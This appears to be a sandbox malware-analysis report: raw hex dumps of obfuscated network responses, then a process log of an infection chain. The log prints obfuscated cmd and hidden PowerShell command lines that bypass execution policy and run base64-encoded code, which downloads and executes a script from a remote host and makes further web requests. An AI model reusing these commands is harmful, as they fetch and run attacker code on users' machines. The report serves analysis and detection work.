                                                                                      2024-11-08 09:48:02 UTC268INData Raw: 02 15 1f 4f 4d 4f 4f 4f 4b 4f 40 4f b0 b0 4f 4f f7 4f 4f 4f 4f 4f 4f 4f 0f 4f 55 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4e 4f 4f f5 5f 4f 41 50 fb 46 82 6e f7 4e 03 82 6e df df 1b 27 26 3c 6f 3f 3d 20 28 3d 2e 22 6f 22 3a 3c 3b 6f 2d 2a 6f 3d 3a 21 6f 3a 21 2b 2a 3d 6f 18 26 21 7c 7d 42 45 6b 78 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f
                                                                                      Data Ascii: OMOOOKO@OOOOOOOOOOOUOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOONOO_OAPFnNn'&<o?= (=."o":<;o-*o=:!o:!+*=o&!|}BEkxOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO
                                                                                      2024-11-08 09:48:02 UTC1369INData Raw: 4f 4f 4f 4f 4f 4f 4f 4f af 4f 4d 4e 44 4e 4d 56 4f 43 41 4f 4f 0f 5c 4f 4f 4f 4f 4f 33 42 41 4f 4f 5f 4f 4f 4f 7f 41 4f 4f 4f 0f 4f 4f 5f 4f 4f 4f 4d 4f 4f 49 4f 4f 4f 4f 4f 4f 4f 49 4f 4f 4f 4f 4f 4f 4f 4f 7f 6d 4f 4f 4b 4f 4f 4f 4f 4f 4f 4c 4f 0f ce 4f 4f 5f 4f 4f 0f 4f 4f 4f 4f 5f 4f 4f 5f 4f 4f 4f 4f 4f 4f 5f 4f 4f 4f 4f 5f 40 4f 3e 4f 4f 4f 4f af 41 4f 4b 5e 4f 4f 4f df 5f 4f 4f d3 5e 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 0f 40 4f 43 04 4e 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 7f 40 4f 57 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 47 ac 41 4f df 4d 4f 4f 4f 4f 40 4f 29 4d 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 61 3b 2a 37 3b 4f 4f 4f 6f a9 42 4f 4f 5f 4f 4f 4f a7 42
                                                                                      Data Ascii: OOOOOOOOOMNDNMVOCAOO\OOOOO3BAOO_OOOAOOOOO_OOOMOOIOOOOOOOIOOOOOOOOmOOKOOOOOOLOOO_OOOOOO_OO_OOOOOO_OOOO_@O>OOOOAOK^OOO_OO^OOOOOOOOOOOOOOOOOO@OCNOOOOOOOOOOOOOOOOOOOOOOOOOO@OWOOOOOOOOOOOOOOOOOOOGAOMOOOO@O)MOOOOOOOOOOOOOOOOOOa;*7;OOOoBOO_OOOB
                                                                                      2024-11-08 09:48:02 UTC1369INData Raw: 23 4d 4f 4f 4f cf b0 b0 b0 30 17 5d 0f 4f 4a 09 2e 23 3c 2a 4b 1b 3d 3a 2a 49 1c 36 3c 3b 2a 22 4d 4f 4f c3 5d 0f 4f 4c 47 03 20 21 28 0d 20 20 23 4b 4f 4f 4f cf b0 b0 b0 30 c7 5d 0f 4f 4a 09 2e 23 3c 2a 4b 1b 3d 3a 2a 49 1c 36 3c 3b 2a 22 4d 4f 4f f3 5d 0f 4f 5d 49 3c 3b 3d 26 21 28 4d 4f 4f 4f 83 5d 0f 4f 44 45 18 26 2b 2a 1c 3b 3d 26 21 28 4d 4f 4f 4f af 5d 0f 4f 45 45 0e 21 3c 26 1c 3b 3d 26 21 28 4f 4f 4d 4f bb 5d 0f 4f 43 48 19 2e 3d 26 2e 21 3b 4d 4f 4f 4b 5c 0f 4f 43 45 00 23 2a 19 2e 3d 26 2e 21 3b 4d 4f 4f 4f 57 5c 0f 4f 5c 49 1b 0c 23 2e 3c 3c d3 50 0f 4f 4d 4f 4f 4f 63 5c 0f 4f 4e 48 07 1d 0a 1c 1a 03 1b 4b 4f 4f 4f cf b0 b0 b0 30 4d 4f 0b 5c 0f 4f 41 4a 1b 08 1a 06 0b 5f 4f 4f 4f 4f 4f 4f 4f 4f 4b 4f 4f 4f ab 5f 0f 4f 4f 4f 4f 4f 4d 4d 0b 7e
                                                                                      Data Ascii: #MOOO0]OJ.#<*K=:*I6<;*"MOO]OLG !( #KOOO0]OJ.#<*K=:*I6<;*"MOO]O]I<;=&!(MOOO]ODE&+*;=&!(MOOO]OEE!<&;=&!(OOMO]OCH.=&.!;MOOK\OCE#*.=&.!;MOOOW\O\I#.<<POMOOOc\ONHKOOO0MO\OAJ_OOOOOOOOKOOO_OOOOOMM~
                                                                                      2024-11-08 09:48:02 UTC1369INData Raw: bb b0 5f 55 0f 4f 0c 4f bb b0 74 55 0f 4f 0c 4f bb b0 2b 55 0f 4f 0c 4f bb b0 df 55 0f 4f 0c 4f bb b0 83 55 0f 4f 0c 4f bb b0 48 54 0f 4f 0c 4f bb b0 0d 54 0f 4f 0c 4f bb b0 c7 54 0f 4f 0c 4f bb b0 8a 54 0f 4f 0d 4f bb b0 b0 54 0f 4f 0d 4f bb b0 76 53 0f 4f 0d 4f bb b0 30 53 0f 4f 0c 4f bb b0 f2 53 0f 4f 0c 4f bb b0 a1 53 0f 4f 0c 4f bb b0 6e 52 0f 4f 0c 4f bb b0 1a 52 0f 4f 05 4f ba b0 c7 52 0f 4f 05 4f b9 b0 fc 52 0f 4f 05 4f b8 b0 a9 52 0f 4f 05 4f b7 b0 0e 51 0f 4f 05 4f b6 b0 3d 51 0f 4f 05 4f b5 b0 ec 51 0f 4f 05 4f b4 b0 93 51 0f 4f 05 4f b3 b0 54 50 0f 4f 04 4f b2 b0 09 50 0f 4f 05 4f b1 b0 3d 50 0f 4f 02 4f b0 b0 4f 4f 48 1b 00 2d 25 2a 2c 3b 69 4f 9f c1 0f 4f 49 0c 3d 2a 2e 3b 2a 4c 4f 4f 4f 4f 4f 47 4f 4e 47 d3 50 0f 4f 4f 4f 4b 1c 2a 23 29 4d
                                                                                      Data Ascii: _UOOtUOO+UOOUOOUOOHTOOTOOTOOTOOTOOvSOO0SOOSOOSOOnROOROOROOROOROOQOO=QOOQOOQOOTPOOPOO=POOOOH-%*,;iOOI=*.;*LOOOOOGONGPOOOK*#)M
                                                                                      2024-11-08 09:48:02 UTC516INData Raw: 0f 4f 4e 4f 4e 4e 4d 4f 4d 4f 7b 4f 77 de 0f 4f 46 1a 21 26 3b 1c 2c 20 3f 2a 4c 4f f7 5d 0f 4f 47 4f 4d 4f 4f 4f 4f 4f 4f 4f 4b 1c 2a 23 29 4d 4f 0f f7 5d 0f 4f 4e 4f 4e 4e 4d 4f 4d 4f 7c 4f 53 df 0f 4f 49 0a 3e 3a 2e 23 3c 4c 4f 4f 5f 0f 4f 47 4f 4d 47 d3 50 0f 4f 4f 4f 4b 1c 2a 23 29 4d 4f 47 d3 50 0f 4f 4e 4f 4c 00 2d 25 4d 4f 4d 4f 64 4f 6b df 0f 4f 44 08 2a 3b 07 2e 3c 27 0c 20 2b 2a 4c 4f d3 5f 0f 4f 47 4f 4e 47 d3 50 0f 4f 4f 4f 4b 1c 2a 23 29 4d 4f 4d 4f 7c 4f 43 dc 0f 4f 47 1b 20 1c 3b 3d 26 21 28 4c 4f f7 5d 0f 4f 47 4f 4d 47 d3 50 0f 4f 4f 4f 4b 1c 2a 23 29 4d 4f 0f f7 5d 0f 4f 4e 4f 4e 4e 4d 4f 4d 4f 14 4f 4b dc 0f 4f 5e 1c 2e 29 2a 0c 2e 23 23 0a 37 2c 2a 3f 3b 26 20 21 4c 4f 67 5c 0f 4f 47 4f 4c 47 d3 50 0f 4f 4f 4f 4b 1c 2a 23 29 4d 4f 47
                                                                                      Data Ascii: ONONNMOMO{OwOF!&;, ?*LO]OGOMOOOOOOOK*#)MO]ONONNMOMO|OSOI>:.#<LOO_OGOMGPOOOK*#)MOGPONOL-%MOMOdOkOD*;.<' +*LO_OGONGPOOOK*#)MOMO|OCOG ;=&!(LO]OGOMGPOOOK*#)MO]ONONNMOMOOKO^.)*.##7,*?;& !LOg\OGOLGPOOOK*#)MOG
                                                                                      2024-11-08 09:48:03 UTC1369INData Raw: 64 4f a3 c2 0f 4f 44 01 2a 38 06 21 3c 3b 2e 21 2c 2a 4c 4f d3 50 0f 4f 47 4f 4e 4f 4f 4f 4f 4f 4f 4f 4b 1c 2a 23 29 4d 4f 4d 4f 63 4f 4b c1 0f 4f 43 09 3d 2a 2a 06 21 3c 3b 2e 21 2c 2a 4c 4f 4f 4f 4f 4f 47 4f 4e 47 d3 50 0f 4f 4f 4f 4b 1c 2a 23 29 4d 4f 4d 4f 68 4f bf c1 0f 4f 48 0b 2a 3c 3b 3d 20 36 4c 4f 4f 4f 4f 4f 47 4f 4e 47 d3 50 0f 4f 4f 4f 4b 1c 2a 23 29 4d 4f 4d 4f 4f 4f 4f ef 50 0f 4f 48 48 1b 00 2d 25 2a 2c 3b 33 58 0f 4f 4f 4f 4f 4f 4f 4f 49 1c 36 3c 3b 2a 22 4f 4f 4f 4f 4d 4f 4f 4f 4f 4f 53 6f 0f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 77 6f 0f 4f 4f 4f 4f 4f 53 6f 0f 4f 4f 4f 4f 4f 6d 6f 0f 4f 47 4f 4f 4f 6b 58 0f 4f 53 df 0f 4f 6b df 0f 4f 43 dc 0f 4f 4b dc 0f 4f 6b dc 0f 4f 67 dc 0f 4f 63 dc 0f 4f 6f dc 0f 4f a3 c2 0f 4f 4b c1 0f 4f bf c1
                                                                                      Data Ascii: dOOD*8!<;.!,*LOPOGONOOOOOOOK*#)MOMOcOKOC=**!<;.!,*LOOOOOGONGPOOOK*#)MOMOhOOH*<;= 6LOOOOOGONGPOOOK*#)MOMOOOOPOHH-%*,;3XOOOOOOOI6<;*"OOOOMOOOOOSoOOOOOOOOOOOOOwoOOOOOSoOOOOOmoOGOOOkXOSOkOCOKOkOgOcOoOOKO
                                                                                      2024-11-08 09:48:03 UTC1369INData Raw: 4d 4f 47 7b d9 0f 4f 4b 0a 37 26 3b 4f 4f 4f 4f 4f 4f 4f 4d 4f 4f 4f 4f df 6b 0f 4f 41 47 1b 02 20 21 26 3b 20 3d 53 4f 4f 4f 4f 4f 4f 4f 4f 48 4f 4f 4f d3 5f 0f 4f 4f 4f 4f 4f 4f 45 09 03 20 2c 24 0c 20 3a 21 3b 43 4f 7f 6d 0f 4f 9f c1 0f 4f 4f 4f d3 5f 0f 4f 4b 4f 4f 4f 4f 40 09 1d 2a 2c 3a 3d 3c 26 20 21 0c 20 3a 21 3b 4d 4f ab 5f 0f 4f 47 4f 4f 4f 4f 42 09 00 38 21 26 21 28 1b 27 3d 2a 2e 2b 4d 4f 4f 5e 0f 4f 43 4f 4f 4f 4f 45 09 03 20 2c 24 0a 39 2a 21 3b 4d 4f d3 5f 0f 4f 5f 4f 4f 4f 4f 45 09 1c 3f 26 21 0c 20 3a 21 3b 4d 4f d3 6c 0f 4f 5b 4f 4f 4f 4f 45 09 18 2e 26 3b 1e 3a 2a 3a 2a 4d 4f 67 6b 0f 4f 57 4f 4f 4f 4f 45 09 1e 3a 2a 3a 2a 03 20 2c 24 4d 4f 4d 4f 46 4f 46 2f d2 0f 4f 43 1c 2a 3b 1c 3f 26 21 0c 20 3a 21 3b 4f 4f 4f 4f 4f 4f 4d 45 d3 50
                                                                                      Data Ascii: MOG{OK7&;OOOOOOOMOOOOkOAG !&; =SOOOOOOOOHOOO_OOOOOOE ,$ :!;COmOOOO_OKOOOO@*,:=<& ! :!;MO_OGOOOOB8!&!('=*.+MOO^OCOOOOE ,$9*!;MO_O_OOOOE?&! :!;MOlO[OOOOE.&;:*:*MOgkOWOOOOE:*:* ,$MOMOFOF/OC*;?&! :!;OOOOOOMEP
                                                                                      2024-11-08 09:48:03 UTC1369INData Raw: 65 0f 4f 4f 4f 4f 4f 5b 65 0f 4f 4f 4f 4f 4f 55 65 0f 4f 43 4f 4f 4f 6b 58 0f 4f 53 df 0f 4f 6b df 0f 4f 43 dc 0f 4f 4b dc 0f 4f 6b dc 0f 4f 67 dc 0f 4f 63 dc 0f 4f 6f dc 0f 4f a3 c2 0f 4f 4b c1 0f 4f bf c1 0f 4f 4f 4f 4f 4f 4f 4f 5e 1b 01 20 1d 2a 29 0c 20 3a 21 3b 00 2d 25 2a 2c 3b 7f 65 0f 4f 48 5e 1b 01 20 1d 2a 29 0c 20 3a 21 3b 00 2d 25 2a 2c 3b 5b 65 0f 4f d3 50 0f 4f 4f 4f 49 1c 36 3c 3b 2a 22 4f 4f 4f 4f 4d 4f 4f 4f 2f 65 0f 4f 5b 43 1f 1c 27 20 3d 3b 1c 3b 3d 26 21 28 ab 5e 0f 4f 4d 4f 37 65 0f 4f 45 45 1a 1b 09 77 1c 3b 3d 26 21 28 a6 b2 4d 4f c3 65 0f 4f 45 42 1d 2e 38 0d 36 3b 2a 1c 3b 3d 26 21 28 b0 b0 4d 4f 4f eb 65 0f 4f 5b 4a 1f 0d 36 3b 2a fb 5f 0f 4f 4d 4f 4f 4f 4f f7 65 0f 4f 5b 49 1f 06 21 3b 79 7b 5b 5e 0f 4f 4d 4f 4f 4f 83 65 0f 4f
                                                                                      Data Ascii: eOOOOO[eOOOOOUeOCOOOkXOSOkOCOKOkOgOcOoOOKOOOOOOOO^ *) :!;-%*,;eOH^ *) :!;-%*,;[eOPOOOI6<;*"OOOOMOOO/eO[C' =;;=&!(^OMO7eOEEw;=&!(MOeOEB.86;*;=&!(MOOeO[J6;*_OMOOOOeO[I!;y{[^OMOOOeO
                                                                                      2024-11-08 09:48:03 UTC1369INData Raw: 4d 4f 4f 4f 4d 49 19 0d 36 3b 2a 3c 4d 4f 4f 4f 4f 4f 4f 4f 4f 4f 4d 48 1d 2e 38 0b 2e 3b 2e 4d 4f 4d 4f 4f 4f 4f 1f 60 0f 4f 4c 46 1b 1b 36 3f 2a 04 26 21 2b 4e 4f 4f 4f 4f 59 4f 4f 4f 03 60 0f 4f 46 3b 24 1a 21 24 21 20 38 21 46 3b 24 06 21 3b 2a 28 2a 3d 49 3b 24 0c 27 2e 3d 42 3b 24 0a 21 3a 22 2a 3d 2e 3b 26 20 21 48 3b 24 09 23 20 2e 3b 47 3b 24 1c 3b 3d 26 21 28 4a 3b 24 1c 2a 3b 48 3b 24 0c 23 2e 3c 3c 47 3b 24 02 2a 3b 27 20 2b 48 3b 24 18 0c 27 2e 3d 46 3b 24 03 1c 3b 3d 26 21 28 46 3b 24 18 1c 3b 3d 26 21 28 46 3b 24 19 2e 3d 26 2e 21 3b 48 3b 24 0e 3d 3d 2e 36 47 3b 24 1d 2a 2c 20 3d 2b 44 3b 24 06 21 3b 2a 3d 29 2e 2c 2a 48 3b 24 06 21 3b 79 7b 45 3b 24 0b 36 21 0e 3d 3d 2e 36 46 3b 24 1a 1c 3b 3d 26 21 28 45 3b 24 0c 23 2e 3c 3c 1d 2a 29 46
                                                                                      Data Ascii: MOOOMI6;*<MOOOOOOOOOMH.8.;.MOMOOOO`OLF6?*&!+NOOOOYOOO`OF;$!$! 8!F;$!;*(*=I;$'.=B;$!:"*=.;& !H;$# .;G;$;=&!(J;$*;H;$#.<<G;$*;' +H;$'.=F;$;=&!(F;$;=&!(F;$.=&.!;H;$==.6G;$*, =+D;$!;*=).,*H;$!;y{E;$6!==.6F;$;=&!(E;$#.<<*)F
                                                                                      2024-11-08 09:48:03 UTC1369INData Raw: b0 e6 70 0f 4f 0c 4f bb b0 b3 70 0f 4f 0c 4f bb b0 02 0f 0f 4f 0c 4f bb b0 dd 0f 0f 4f 0c 4f bb b0 97 0f 0f 4f 0c 4f bb b0 51 0e 0f 4f 0c 4f bb b0 2b 0e 0f 4f 0c 4f bb b0 e7 0e 0f 4f 0c 4f bb b0 b9 0e 0f 4f 0c 4f bb b0 63 0d 0f 4f 0c 4f bb b0 2b 0d 0f 4f 0c 4f bb b0 ef 0d 0f 4f 0c 4f bb b0 94 0d 0f 4f 0c 4f bb b0 56 0c 0f 4f 0c 4f bb b0 26 0c 0f 4f 0c 4f bb b0 e5 0c 0f 4f 0c 4f bb b0 a9 0c 0f 4f 0c 4f bb b0 7b 0b 0f 4f 0c 4f bb b0 3d 0b 0f 4f 0c 4f bb b0 e1 0b 0f 4f 0c 4f bb b0 4c 0a 0f 4f 0c 4f bb b0 25 0a 0f 4f 0c 4f bb b0 8d 0a 0f 4f 0c 4f bb b0 58 09 0f 4f 0c 4f bb b0 ca 09 0f 4f 0c 4f bb b0 ab 09 0f 4f 0c 4f bb b0 0f 08 0f 4f 0c 4f bb b0 e9 08 0f 4f 0c 4f bb b0 51 07 0f 4f 0c 4f bb b0 de 07 0f 4f 0c 4f bb b0 59 06 0f 4f 0c 4f bb b0 30 06 0f 4f 0c 4f
                                                                                      Data Ascii: pOOpOOOOOOOOQOO+OOOOOOcOO+OOOOOOVOO&OOOOOO{OO=OOOOLOO%OOOOXOOOOOOOOOOQOOOOYOO0OO


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:04:45:41
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit
                                                                                      Imagebase:0x7ff605a10000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:04:45:41
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:04:45:42
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="
                                                                                      Imagebase:0x7ff7b1750000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:04:45:42
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:04:45:44
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline"
                                                                                      Imagebase:0x7ff7a9c60000
                                                                                      File size:2'759'232 bytes
                                                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:04:45:44
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAEBA.tmp" "c:\Users\user\AppData\Local\Temp\p0kqociu\CSCE1A7387FE7C64A8A9613A1F038E91290.TMP"
                                                                                      Imagebase:0x7ff6fb780000
                                                                                      File size:52'744 bytes
                                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:04:45:51
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                      Imagebase:0x7ff7b1750000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:04:45:51
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7b1ef0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:04:45:55
                                                                                      Start date:08/11/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAa